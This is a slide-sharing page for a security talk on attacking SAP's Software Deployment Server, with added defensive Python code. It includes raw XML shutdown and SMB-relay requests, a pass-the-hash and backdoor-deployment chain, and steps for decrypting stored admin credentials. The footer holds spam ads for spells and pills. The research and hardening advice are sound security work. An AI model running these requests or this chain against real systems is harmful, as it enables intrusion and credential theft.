Invest in security to secure investments

Injecting evil code in your SAP J2EE systems: Security of SAP Software Deployment Server

Dmitry Chastukhin. Director of SAP pentest/research team, ERPScan
About ERPScan

• The only 360-degree SAP Security solution - ERPScan Security Monitoring Suite for SAP
• Leader by the number of acknowledgements from SAP (150+)
• 60+ presentations at key security conferences worldwide
• 25 awards and nominations
• Research team - 20 experts with experience in different areas of security
• Headquarters in Palo Alto (US) and Amsterdam (EU)
SAP
• The most popular business application
• More than 250000 customers worldwide
• 83% of Forbes 500 companies run SAP
• Main system – ERP
• 3 platforms:
  - NetWeaver ABAP
  - NetWeaver J2EE
  - BusinessObjects
SAP insecurity

Espionage
• Stealing financial information
• Stealing corporate secrets
• Stealing supplier and customer lists
• Stealing HR data

Fraud
• False transactions
• Modification of master data

Sabotage
• Denial of service
• Modification of financial reports
• Access to technology network (SCADA) by trust relations
SAP vulnerabilities

[Chart: SAP vulnerabilities per year, 2001–2014, y-axis 0–900. More than 2800 in total. Source: SAP Security in Figures]
Is it remotely exploitable?

> 5000 non-web SAP services exposed in the world, including Dispatcher, Message Server, SAP Host Control, etc.

sapscan.com
What about other services?

[Chart: exposed SAP services by type, y-axis 0–9: SAP Dispatcher, SAP MMC, SAP Message Server, SAP HostControl, SAP ITS Agate, SAP Message Server httpd. Source: SAP Security in Figures]
SAP Application servers

• SAP NetWeaver ABAP
• SAP NetWeaver J2EE
  – SAP Portal
  – SAP Solution Manager
  – SAP NetWeaver Development Infrastructure (NWDI)
• SAP BusinessObjects
• SAP HANA Extended Application Services
• SAP SUP
• SAP Fiori

SAP NetWeaver development infrastructure

• Design Time Repository (DTR)
• Component Build Service (CBS)
• Change Management Service (CMS)
• Software Landscape Directory (SLD) / NS
• Software Deployment Manager (SDM)
SAP NetWeaver development infrastructure

[Slides 10–15: architecture diagrams of the SAP NetWeaver development infrastructure, no text content]
Software Deployment Manager

• Single interface for the deployment
• Deploy apps (*.ear, *.war, *.sda)
• Implement custom patches
SDM server

• Different server modes
  – standalone
  – integrated
• Only one user at a time
• Only hardcoded admin user
• Three ports:
  – 50017 – Admin Port
  – 50018 – GUI Port
  – 50019 – HTTP Port
SDM client

• Browsing the distribution of deployed components
• Deploying and undeploying
• Log viewing
SDM attack intro

• SAP infrastructure includes many Java services
• Almost all Java stuff uses UME
• Universal user with a password
• Only one user at a time
• Ability to deploy evil code => plus, see 1st item
SDM attack intro

• Thick client Java application (sad story)
• Scarce communication settings
• Difficult to intercept
• Custom protocols
SDM attack intro

• SAP has its own SAP Java Virtual Machine (JVM)
• Java 6 has Attach API
• Attach to another running JVM
• Intercept and modify calls
Attack SAP SDM. DoS

• If an attacker uses an incorrect password 3 times, the server will shut down automatically
• Also, if you send this request, you can shut down the SDM server manually:

[10 spaces]56<?xml version="1.0"?>
<ShutDownRequest></ShutDownRequest>
Attacking SAP SDM. SMB relay

Packed:

[10 spaces]<?xml version="1.0"?>
<FileAccessRequest f="ip_addrblabla"> </FileAccessRequest>

An old trick, but sometimes it's very useful
Prevention

• Install note 1724516
• Enable the security features of SDM
• SDM server and SDM client need to be updated

https://websmp205.sap-ag.de/~sapidb/012006153200000493902012E/SDM_EnablingSecurity.pdf
From Nobody to Administrator

Now, I will show an interesting attack

Compromise some SAP services → Compromise SAP SDM → Compromise SAP Server OS → Compromise SAP
SDM authentication abuse

• OK. Let's see how authentication in SDM works:
  – user enters password
  – hash is calculated locally on client
  – password hash is sent to server
  – hash is compared to hash from configuration file

Pass the hash attack here!
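The flow above is what makes a read of the configuration file equivalent to knowing the password. The toy below is added here and is not SDM's own code: it puts a verifier of that shape next to a server-side salted design whose stored value cannot be replayed as a login. The hash functions, salt size and PBKDF2 iteration count are assumptions, not SDM parameters.

```python
"""Why the authentication flow on the slide makes a leaked hash a credential.

Added example, not SDM's code. ClientSideHashVerifier has the shape the
slide describes: the client hashes the password itself and the server
compares the received hash with the hash kept in its configuration file.
ServerSideSaltedVerifier keeps only a salted, slow-hashed verifier, so
whoever reads the file still has nothing to present to the server.
Hash choices, salt size and iteration count are assumptions.
"""
import hashlib
import hmac
import secrets


class ClientSideHashVerifier:
    """Weak pattern: the value stored on disk is exactly the value the
    client must transmit, so reading the config file == having the password."""

    def __init__(self, password: str) -> None:
        # what a repository/config file holds: the unsalted password hash
        self.stored_value = hashlib.sha256(password.encode()).hexdigest()

    @staticmethod
    def client_message(password: str) -> str:
        # the client never sends the password, only its hash
        return hashlib.sha256(password.encode()).hexdigest()

    def verify(self, message: str) -> bool:
        # compares what arrived with what is on disk, nothing else
        return hmac.compare_digest(message, self.stored_value)


class ServerSideSaltedVerifier:
    """Corrected pattern: the client sends the password itself over an
    authenticated, encrypted channel (assumed, not modelled here); the
    server keeps only a salted, slow-hashed verifier and recomputes it."""

    ITERATIONS = 100_000  # assumption; tune to the deployment

    def __init__(self, password: str) -> None:
        self.salt = secrets.token_bytes(16)
        self.stored_value = self._derive(password)

    def _derive(self, password: str) -> str:
        return hashlib.pbkdf2_hmac(
            "sha256", password.encode(), self.salt, self.ITERATIONS
        ).hex()

    @staticmethod
    def client_message(password: str) -> str:
        # the client sends the password; the channel, not the hash, protects it
        return password

    def verify(self, message: str) -> bool:
        return hmac.compare_digest(self._derive(message), self.stored_value)


def stored_value_is_credential(verifier) -> bool:
    """Model someone who only read the file: replay the stored value as the
    login message. True means the stored hash is password-equivalent."""
    return verifier.verify(verifier.stored_value)


def legitimate_login_works(verifier, password: str) -> bool:
    """A normal client login with the real password."""
    return verifier.verify(verifier.client_message(password))


if __name__ == "__main__":
    pw = "constructed-demo-password"  # constructed, not a real credential
    for cls in (ClientSideHashVerifier, ServerSideSaltedVerifier):
        v = cls(pw)
        print(f"{cls.__name__}: login ok={legitimate_login_works(v, pw)}, "
              f"leaked file is a credential={stored_value_is_credential(v)}")
```

The weak design reports the leaked file as a working credential; the salted design still authenticates the real password but rejects the replayed verifier.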
  
SDM authentication abuse (screenshots)

RootFrame.class

…\SDM\program\config\sdmrepository.sdc

SMDAuthenticatorImpl.class
Attack on SAP SDM

Read sdmrepository.sdc → Get password hash → Use hash as password to authenticate on SDM server → Deploy backdoor on SAP Server → PROFIT!
File read

• OS command execution through CTC (Notes 1467771, 1445998)
• XML External Entities (Note 1619539)
• Directory Traversal (Note 1630293)
• Through MMC file read function (Notes 927637 and 1439348)

We have something new for you :)
SAP Log Viewer standalone

• Open ports: 26000 (NI), 1099 (RMI), 5465 (Socket)
• You can:
  – View log on local server
  – View log on remote server
  – Register file as log file

Read log file without authentication!
SAP Log Viewer standalone

Attack is pretty easy:

Connect to LogViewer standalone Server → Register sdmrepository.sdc file as log file → Read it
SAP Log Viewer standalone

[Screenshot]

When we have a password hash, we can use it as password to authenticate on SDM server
SDM intrusion

Full info about the SDM repository
Bypassing SDM restrictions

• Observe all server directories
• Read arbitrary files via Log Viewer
SDM undeploying

Undeploy any application

SDM backdooring

Deploy any application
SDM backdooring

• before
• after

SDM post-exploitation
Prevention

• Install Notes 1724516, 1685106
• Enable the security features of SDM
• SDM server and SDM client need to be updated

https://websmp205.sap-ag.de/~sapidb/012006153200000493902012E/SDM_EnablingSecurity.pdf
  	
“The Software Deployment Manager (SDM) uses the database connection information, the J2EE Engine administrator user and password from the secure storage in the file system, to connect to the J2EE Engine and perform tasks such as software deployment and undeployment”.

http://help.sap.com/saphelp_nw70ehp1/helpdata/en/3d/2e104202795e33e10000000a155106/content.htm

Wow! J2EE Engine administrator user and password

Where is all this stuff located?

SAP SecStore
SAP SecStore

“By default, the J2EE Engine stores secure data in the file \usr\sap\<SID>\SYS\global\security\data\SecStore.properties in the file system”.

“The J2EE Engine uses the SAP Java Cryptography Toolkit to encrypt the contents of the secure store with the tripleDES algorithm”.

http://help.sap.com/saphelp_nw70ehp1/helpdata/en/3d/2e104202795e33e10000000a155106/content.htm

OK. Let's try to read SecStore.properties
SAP SecStore

• We can execute any OS command (we have our backdoor)
• We know the SAP J2EE Engine stores the database user SAP<SID>DB; its password is here: \usr\sap\<SID>\SYS\global\security\data\SecStore.properties
• It's all that we need
SecStore.properties (as shown on the slide):

$internal/version=Ni4zFF4wMSeaseforCCMxegAfx
admin/host/TTT=7KJuOPPs/+u+14jM7uy7cy7exrZuYvevkSrPxwueur2445yxgBS
admin/password/TTT=7KJuOPPs/+uv+14j56vDc7M7v7dytbGbkgqDp+QD04b0Fh
jdbc/pool/TTT=7KJuOPPs/+u5jM6s1cvvgQ1gzFvarxuUzEJTHTJI0VGegH
admin/port/TTT=7KJuOPPs/+u+1j4vD1cv6ZTvd336rzEd7267Rwr4ZUgRTQ
$internal/check=BJRrzfjeUA+bw4XCzdz16zX78ufbt
$internal/mode=encrypted
admin/user/TTT=7KJuOPPs/+u+14j6s14sTxXU3ONl3rL6N7yssV75eC6/5S3E
But where is the key?

Get the password

• We have an encrypted password
• We have a key to decrypt it

We got the J2EE admin and JDBC login:password!
Prevention

Restrict read access to files SecStore.properties and SecStore.key

http://help.sap.com/saphelp_nw73ehp1/helpdata/en/cd/14c93ec2f7df6ae10000000a114084/content.htm
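A check for the prevention advice above, added here and not taken from the deck or from SAP: it audits the permission bits on SecStore.properties and SecStore.key and confirms the store still reports $internal/mode=encrypted. The data directory, the expected owner uid and POSIX permission semantics are assumptions; the demo runs on constructed files in a temporary directory.

```python
"""Audit the on-disk protection of the SAP J2EE secure store.

Added example, not part of the ERPScan deck. It checks what the prevention
slide asks for: SecStore.properties and SecStore.key must be readable only
by their owner, and the store must still report $internal/mode=encrypted.
The directory layout and the owner uid are assumptions; run on POSIX,
where st_mode carries real permission bits.
"""
import os
import stat
import tempfile
from dataclasses import dataclass

SECSTORE_FILES = ("SecStore.properties", "SecStore.key")

# Any of these bits set means a process that is not the owner can read (or
# alter) the store. The file-read bugs listed in the deck (Log Viewer, MMC,
# XXE, traversal) run as some SAP service and only succeed against files
# that service is allowed to open.
EXPOSED_BITS = stat.S_IRGRP | stat.S_IWGRP | stat.S_IROTH | stat.S_IWOTH


@dataclass
class Finding:
    path: str
    issue: str


def parse_secstore(path):
    """Return the key=value pairs of a SecStore.properties file as a dict."""
    props = {}
    with open(path, encoding="utf-8") as fh:
        for raw in fh:
            line = raw.strip()
            if not line or line.startswith("#") or "=" not in line:
                continue
            key, _, value = line.partition("=")
            props[key.strip()] = value.strip()
    return props


def audit_secstore_dir(data_dir, expected_uid=None):
    """Check both secure-store files; return a list of Finding (empty = ok)."""
    findings = []
    for name in SECSTORE_FILES:
        path = os.path.join(data_dir, name)
        try:
            st = os.stat(path)
        except FileNotFoundError:
            findings.append(Finding(path, "missing"))
            continue
        mode = stat.S_IMODE(st.st_mode)
        if mode & EXPOSED_BITS:
            findings.append(Finding(path, f"readable by group/other (mode {mode:04o})"))
        if expected_uid is not None and st.st_uid != expected_uid:
            findings.append(Finding(path, f"owned by uid {st.st_uid}, expected {expected_uid}"))
    props_path = os.path.join(data_dir, "SecStore.properties")
    if os.path.isfile(props_path):
        if parse_secstore(props_path).get("$internal/mode") != "encrypted":
            findings.append(Finding(props_path, "store is not in encrypted mode"))
    return findings


def write_demo_store(data_dir, props_mode, key_mode, store_mode="encrypted"):
    """Write a constructed (fake) secure-store pair with the given modes."""
    props = os.path.join(data_dir, "SecStore.properties")
    key = os.path.join(data_dir, "SecStore.key")
    with open(props, "w", encoding="utf-8") as fh:
        # constructed entries in the deck's key layout; values are not real ciphertext
        fh.write(f"$internal/mode={store_mode}\n")
        fh.write("admin/user/TTT=CONSTRUCTED-CIPHERTEXT-1\n")
        fh.write("admin/password/TTT=CONSTRUCTED-CIPHERTEXT-2\n")
    with open(key, "w", encoding="utf-8") as fh:
        fh.write("CONSTRUCTED-KEY-MATERIAL\n")
    os.chmod(props, props_mode)
    os.chmod(key, key_mode)


def run_demo():
    """Three scenarios on constructed files; returns {name: [issue, ...]}."""
    results = {}
    scenarios = {
        "world_readable": (0o644, 0o644, "encrypted"),
        "owner_only": (0o600, 0o600, "encrypted"),
        "plaintext_store": (0o600, 0o600, "plain"),
    }
    for name, (pm, km, sm) in scenarios.items():
        with tempfile.TemporaryDirectory() as d:
            write_demo_store(d, pm, km, sm)
            results[name] = [f.issue for f in audit_secstore_dir(d)]
    return results


if __name__ == "__main__":
    for scenario, issues in run_demo().items():
        print(f"{scenario}: {issues or 'OK'}")
```

Point audit_secstore_dir at the real data directory (with expected_uid set to the <sid>adm uid) to use it outside the demo.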
  	
  
	
  
Post-exploitation

SDM hacking demo
SAP Guides

It's all in your hands:

Regular security assessments
ABAP code review
Monitoring technical security
Segregation of Duties
Security events monitoring

Conclusion

It is possible to protect yourself from these kinds of issues, and we are working closely with SAP to keep customers secure

Future work
I'd like to thank SAP's Product Security Response Team for the great cooperation to make SAP systems more secure. Research is always ongoing, and we can't share all of it today. If you want to be the first to see new attacks and demos, follow us at @erpscan and attend future presentations:

web: www.erpscan.com
e-mail: info@erpscan.com, sales@erpscan.com

Oracle PeopleSoft applications are under attacks (Hack in Paris)
 
5 real ways to destroy business by breaking SAP applications
5 real ways to destroy business by breaking SAP applications5 real ways to destroy business by breaking SAP applications
5 real ways to destroy business by breaking SAP applications
 
13 real ways to destroy business by breaking company’s SAP applications
13 real ways to destroy business by breaking company’s SAP applications13 real ways to destroy business by breaking company’s SAP applications
13 real ways to destroy business by breaking company’s SAP applications
 
EAS-SEC Project
EAS-SEC ProjectEAS-SEC Project
EAS-SEC Project
 
If I want a perfect cyberweapon, I'll target ERP
If I want a perfect cyberweapon, I'll target ERPIf I want a perfect cyberweapon, I'll target ERP
If I want a perfect cyberweapon, I'll target ERP
 
What CISOs should know about SAP security
What CISOs should know about SAP securityWhat CISOs should know about SAP security
What CISOs should know about SAP security
 
With big data comes big responsibility
With big data comes big responsibilityWith big data comes big responsibility
With big data comes big responsibility
 
Practical pentesting of ERPs and business applications
Practical pentesting of ERPs and business applicationsPractical pentesting of ERPs and business applications
Practical pentesting of ERPs and business applications
 
Breaking SAP portal (HashDays)
Breaking SAP portal (HashDays)Breaking SAP portal (HashDays)
Breaking SAP portal (HashDays)
 
SSRF vs. Business-critical applications. Part 2. New vectors and connect-back...
SSRF vs. Business-critical applications. Part 2. New vectors and connect-back...SSRF vs. Business-critical applications. Part 2. New vectors and connect-back...
SSRF vs. Business-critical applications. Part 2. New vectors and connect-back...
 

Dernier

Direct Style Effect Systems - The Print[A] Example - A Comprehension Aid
Direct Style Effect Systems -The Print[A] Example- A Comprehension AidDirect Style Effect Systems -The Print[A] Example- A Comprehension Aid
Direct Style Effect Systems - The Print[A] Example - A Comprehension AidPhilip Schwarz
 
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...panagenda
 
%+27788225528 love spells in Toronto Psychic Readings, Attraction spells,Brin...
%+27788225528 love spells in Toronto Psychic Readings, Attraction spells,Brin...%+27788225528 love spells in Toronto Psychic Readings, Attraction spells,Brin...
%+27788225528 love spells in Toronto Psychic Readings, Attraction spells,Brin...masabamasaba
 
Artyushina_Guest lecture_YorkU CS May 2024.pptx
Artyushina_Guest lecture_YorkU CS May 2024.pptxArtyushina_Guest lecture_YorkU CS May 2024.pptx
Artyushina_Guest lecture_YorkU CS May 2024.pptxAnnaArtyushina1
 
What Goes Wrong with Language Definitions and How to Improve the Situation
What Goes Wrong with Language Definitions and How to Improve the SituationWhat Goes Wrong with Language Definitions and How to Improve the Situation
What Goes Wrong with Language Definitions and How to Improve the SituationJuha-Pekka Tolvanen
 
WSO2CON 2024 - Does Open Source Still Matter?
WSO2CON 2024 - Does Open Source Still Matter?WSO2CON 2024 - Does Open Source Still Matter?
WSO2CON 2024 - Does Open Source Still Matter?WSO2
 
%in kaalfontein+277-882-255-28 abortion pills for sale in kaalfontein
%in kaalfontein+277-882-255-28 abortion pills for sale in kaalfontein%in kaalfontein+277-882-255-28 abortion pills for sale in kaalfontein
%in kaalfontein+277-882-255-28 abortion pills for sale in kaalfonteinmasabamasaba
 
%in Benoni+277-882-255-28 abortion pills for sale in Benoni
%in Benoni+277-882-255-28 abortion pills for sale in Benoni%in Benoni+277-882-255-28 abortion pills for sale in Benoni
%in Benoni+277-882-255-28 abortion pills for sale in Benonimasabamasaba
 
WSO2CON 2024 - WSO2's Digital Transformation Journey with Choreo: A Platforml...
WSO2CON 2024 - WSO2's Digital Transformation Journey with Choreo: A Platforml...WSO2CON 2024 - WSO2's Digital Transformation Journey with Choreo: A Platforml...
WSO2CON 2024 - WSO2's Digital Transformation Journey with Choreo: A Platforml...WSO2
 
Devoxx UK 2024 - Going serverless with Quarkus, GraalVM native images and AWS...
Devoxx UK 2024 - Going serverless with Quarkus, GraalVM native images and AWS...Devoxx UK 2024 - Going serverless with Quarkus, GraalVM native images and AWS...
Devoxx UK 2024 - Going serverless with Quarkus, GraalVM native images and AWS...Bert Jan Schrijver
 
tonesoftg
tonesoftgtonesoftg
tonesoftglanshi9
 
%+27788225528 love spells in Knoxville Psychic Readings, Attraction spells,Br...
%+27788225528 love spells in Knoxville Psychic Readings, Attraction spells,Br...%+27788225528 love spells in Knoxville Psychic Readings, Attraction spells,Br...
%+27788225528 love spells in Knoxville Psychic Readings, Attraction spells,Br...masabamasaba
 
OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...
OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...
OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...Shane Coughlan
 
%in kempton park+277-882-255-28 abortion pills for sale in kempton park
%in kempton park+277-882-255-28 abortion pills for sale in kempton park %in kempton park+277-882-255-28 abortion pills for sale in kempton park
%in kempton park+277-882-255-28 abortion pills for sale in kempton park masabamasaba
 
%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...
%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...
%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...masabamasaba
 
8257 interfacing 2 in microprocessor for btech students
8257 interfacing 2 in microprocessor for btech students8257 interfacing 2 in microprocessor for btech students
8257 interfacing 2 in microprocessor for btech studentsHimanshiGarg82
 
%in tembisa+277-882-255-28 abortion pills for sale in tembisa
%in tembisa+277-882-255-28 abortion pills for sale in tembisa%in tembisa+277-882-255-28 abortion pills for sale in tembisa
%in tembisa+277-882-255-28 abortion pills for sale in tembisamasabamasaba
 
%in Hazyview+277-882-255-28 abortion pills for sale in Hazyview
%in Hazyview+277-882-255-28 abortion pills for sale in Hazyview%in Hazyview+277-882-255-28 abortion pills for sale in Hazyview
%in Hazyview+277-882-255-28 abortion pills for sale in Hazyviewmasabamasaba
 
Payment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdf
Payment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdfPayment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdf
Payment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdfkalichargn70th171
 

Dernier (20)

Direct Style Effect Systems - The Print[A] Example - A Comprehension Aid
Direct Style Effect Systems -The Print[A] Example- A Comprehension AidDirect Style Effect Systems -The Print[A] Example- A Comprehension Aid
Direct Style Effect Systems - The Print[A] Example - A Comprehension Aid
 
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
 
%+27788225528 love spells in Toronto Psychic Readings, Attraction spells,Brin...
%+27788225528 love spells in Toronto Psychic Readings, Attraction spells,Brin...%+27788225528 love spells in Toronto Psychic Readings, Attraction spells,Brin...
%+27788225528 love spells in Toronto Psychic Readings, Attraction spells,Brin...
 
Artyushina_Guest lecture_YorkU CS May 2024.pptx
Artyushina_Guest lecture_YorkU CS May 2024.pptxArtyushina_Guest lecture_YorkU CS May 2024.pptx
Artyushina_Guest lecture_YorkU CS May 2024.pptx
 
Abortion Pill Prices Tembisa [(+27832195400*)] 🏥 Women's Abortion Clinic in T...
Abortion Pill Prices Tembisa [(+27832195400*)] 🏥 Women's Abortion Clinic in T...Abortion Pill Prices Tembisa [(+27832195400*)] 🏥 Women's Abortion Clinic in T...
Abortion Pill Prices Tembisa [(+27832195400*)] 🏥 Women's Abortion Clinic in T...
 
What Goes Wrong with Language Definitions and How to Improve the Situation
What Goes Wrong with Language Definitions and How to Improve the SituationWhat Goes Wrong with Language Definitions and How to Improve the Situation
What Goes Wrong with Language Definitions and How to Improve the Situation
 
WSO2CON 2024 - Does Open Source Still Matter?
WSO2CON 2024 - Does Open Source Still Matter?WSO2CON 2024 - Does Open Source Still Matter?
WSO2CON 2024 - Does Open Source Still Matter?
 
%in kaalfontein+277-882-255-28 abortion pills for sale in kaalfontein
%in kaalfontein+277-882-255-28 abortion pills for sale in kaalfontein%in kaalfontein+277-882-255-28 abortion pills for sale in kaalfontein
%in kaalfontein+277-882-255-28 abortion pills for sale in kaalfontein
 
%in Benoni+277-882-255-28 abortion pills for sale in Benoni
%in Benoni+277-882-255-28 abortion pills for sale in Benoni%in Benoni+277-882-255-28 abortion pills for sale in Benoni
%in Benoni+277-882-255-28 abortion pills for sale in Benoni
 
WSO2CON 2024 - WSO2's Digital Transformation Journey with Choreo: A Platforml...
WSO2CON 2024 - WSO2's Digital Transformation Journey with Choreo: A Platforml...WSO2CON 2024 - WSO2's Digital Transformation Journey with Choreo: A Platforml...
WSO2CON 2024 - WSO2's Digital Transformation Journey with Choreo: A Platforml...
 
Devoxx UK 2024 - Going serverless with Quarkus, GraalVM native images and AWS...
Devoxx UK 2024 - Going serverless with Quarkus, GraalVM native images and AWS...Devoxx UK 2024 - Going serverless with Quarkus, GraalVM native images and AWS...
Devoxx UK 2024 - Going serverless with Quarkus, GraalVM native images and AWS...
 
tonesoftg
tonesoftgtonesoftg
tonesoftg
 
%+27788225528 love spells in Knoxville Psychic Readings, Attraction spells,Br...
%+27788225528 love spells in Knoxville Psychic Readings, Attraction spells,Br...%+27788225528 love spells in Knoxville Psychic Readings, Attraction spells,Br...
%+27788225528 love spells in Knoxville Psychic Readings, Attraction spells,Br...
 
OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...
OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...
OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...
 
%in kempton park+277-882-255-28 abortion pills for sale in kempton park
%in kempton park+277-882-255-28 abortion pills for sale in kempton park %in kempton park+277-882-255-28 abortion pills for sale in kempton park
%in kempton park+277-882-255-28 abortion pills for sale in kempton park
 
%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...
%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...
%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...
 
8257 interfacing 2 in microprocessor for btech students
8257 interfacing 2 in microprocessor for btech students8257 interfacing 2 in microprocessor for btech students
8257 interfacing 2 in microprocessor for btech students
 
%in tembisa+277-882-255-28 abortion pills for sale in tembisa
%in tembisa+277-882-255-28 abortion pills for sale in tembisa%in tembisa+277-882-255-28 abortion pills for sale in tembisa
%in tembisa+277-882-255-28 abortion pills for sale in tembisa
 
%in Hazyview+277-882-255-28 abortion pills for sale in Hazyview
%in Hazyview+277-882-255-28 abortion pills for sale in Hazyview%in Hazyview+277-882-255-28 abortion pills for sale in Hazyview
%in Hazyview+277-882-255-28 abortion pills for sale in Hazyview
 
Payment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdf
Payment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdfPayment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdf
Payment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdf
 

Injecting evil code in your SAP J2EE systems. Security of SAP Software Deployment Server

  • 5. SAP vulnerabilities per year, 2001-2014 (chart): more than 2800 in total. Source: SAP Security in Figures
  • 6. Is it remotely exploitable?
    - > 5000 non-web SAP services exposed in the world, including Dispatcher, Message Server, SAP Host Control, etc. (sapscan.com)
  • 7. What about other services? (chart of exposed services: SAP Dispatcher, SAP MMC, SAP Message Server, SAP HostControl, SAP ITS Agate, SAP Message Server httpd). Source: SAP Security in Figures
  • 8. SAP application servers
    - SAP NetWeaver ABAP
    - SAP NetWeaver J2EE
      - SAP Portal
      - SAP Solution Manager
      - SAP NetWeaver Development Infrastructure (NWDI)
    - SAP BusinessObjects
    - SAP HANA Extended Application Services
    - SAP SUP
    - SAP Fiori
  • 9. SAP NetWeaver development infrastructure
    - Design Time Repository (DTR)
    - Component Build Service (CBS)
    - Change Management Service (CMS)
    - Software Landscape Directory (SLD) / NS
    - Software Deployment Manager (SDM)
  • 10-15. SAP NetWeaver development infrastructure (no text on these slides)
  • 16. Software Deployment Manager
    - Single interface for the deployment
    - Deploy apps (*.ear, *.war, *.sda)
    - Implement custom patches
  • 17. SDM server
    - Different server modes: standalone, integrated
    - Only one user at a time
    - Only hardcoded admin user
    - Three ports: 50017 (Admin Port), 50018 (GUI Port), 50019 (HTTP Port)
  • 18. SDM client
    - Browsing the distribution of deployed components
    - Deploying and undeploying
    - Log viewing
  • 19. SDM attack intro
    - SAP infrastructure includes many Java services
    - Almost all Java stuff uses UME
    - Universal user with a password
    - Only one user at a time
    - Ability to deploy evil code => plus, see 1st item
  • 20. SDM attack intro
    - Thick client Java application (sad story)
    - Scarce communication settings
    - Difficult to intercept
    - Custom protocols
  • 21. SDM attack intro
    - SAP has its own SAP Java Virtual Machine (JVM)
    - Java 6 has Attach API
    - Attach to another running JVM
    - Intercept and modify calls
  • 22. Attack SAP SDM. DoS
    - If an attacker uses an incorrect password 3 times, the server will shut down automatically
    - Also, if you send this request, you can shut down the SDM server manually: [10 spaces]56<?xml version="1.0"?> <ShutDownRequest></ShutDownRequest>
  • 23. Attacking SAP SDM. SMB relay
    - Packet: [10 spaces]<?xml version="1.0"?> <FileAccessRequest f="ip_addrblabla"> </FileAccessRequest>
    - An old trick, but sometimes it's very useful
  • 24. Prevention
    - Install Note 1724516
    - Enable the security features of SDM
    - SDM server and SDM client need to be updated
    - https://websmp205.sap-ag.de/~sapidb/012006153200000493902012E/SDM_EnablingSecurity.pdf
  • 25. From Nobody to Administrator
    - Now, I will show an interesting attack
    - Compromise some SAP services -> Compromise SAP SDM -> Compromise SAP server OS -> Compromise SAP
  • 26. SDM authentication abuse
    - OK. Let's see how authentication in SDM works:
      - user enters password
      - hash is calculated locally on client
      - password hash is sent to server
      - hash is compared to hash from configuration file
    - Pass the hash attack here!
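The client-side hashing flow on this slide, modelled in Python as an added example (not code from the presentation or from SAP): the weak scheme accepts the value stored in the configuration file directly, while server-side salted hashing does not, at the price that the password itself must then reach the server over a protected channel such as TLS. Function names, the sample password and SHA-256/PBKDF2 are constructed assumptions; the slide does not show SDM's real hash algorithm.

```python
"""Client-side hashing vs. server-side salted hashing (added example).

Models the authentication flow described on the slide with constructed
names; the actual SDM hash function is not shown there, so SHA-256 stands
in for it. Not code from the presentation or from SAP.
"""
import hashlib
import hmac
import os
from typing import Optional, Tuple


# --- Weak design, as the slide describes it -----------------------------------

def client_side_hash(password: str) -> str:
    """The client hashes the password itself; this digest is what goes on the wire."""
    return hashlib.sha256(password.encode("utf-8")).hexdigest()


def weak_server_check(config_hash: str, received: str) -> bool:
    """The server compares the received digest with the one from its config file.

    It never sees a password, so any client that can present the config
    value passes: the stored hash is a password-equivalent.
    """
    return hmac.compare_digest(config_hash, received)


# --- Hardened design: the server does the hashing ----------------------------

def make_verifier(password: str, salt: Optional[bytes] = None,
                  rounds: int = 100_000) -> Tuple[bytes, bytes]:
    """Derive a salted PBKDF2-HMAC-SHA256 verifier for storage on the server."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, rounds)
    return salt, digest


def hardened_server_check(salt: bytes, stored: bytes, received_secret: str) -> bool:
    """The server re-derives the verifier from whatever secret the client sent.

    The client must send the password (over TLS), not a digest, so feeding
    the stored verifier back in is just another wrong password. Note that a
    challenge-response scheme keyed with the stored hash (NTLM-style) would
    NOT fix the problem, because the key itself would still be replayable.
    """
    _, digest = make_verifier(received_secret, salt)
    return hmac.compare_digest(stored, digest)


def demo() -> dict:
    """Run both designs against a legitimate login and a config-file-only client."""
    password = "constructed-admin-password"  # placeholder, not a real credential

    # weak design: the config file holds the bare hash
    config_hash = client_side_hash(password)
    weak_legit = weak_server_check(config_hash, client_side_hash(password))
    weak_replay = weak_server_check(config_hash, config_hash)  # no password needed

    # hardened design: the config file holds salt + PBKDF2 verifier
    salt, verifier = make_verifier(password)
    hard_legit = hardened_server_check(salt, verifier, password)
    hard_replay = hardened_server_check(salt, verifier, verifier.hex())

    return {"weak_legit": weak_legit, "weak_replay": weak_replay,
            "hard_legit": hard_legit, "hard_replay": hard_replay}


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name}: {'authenticated' if ok else 'rejected'}")
```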
  • 27. SDM authentication abuse: RootFrame.class
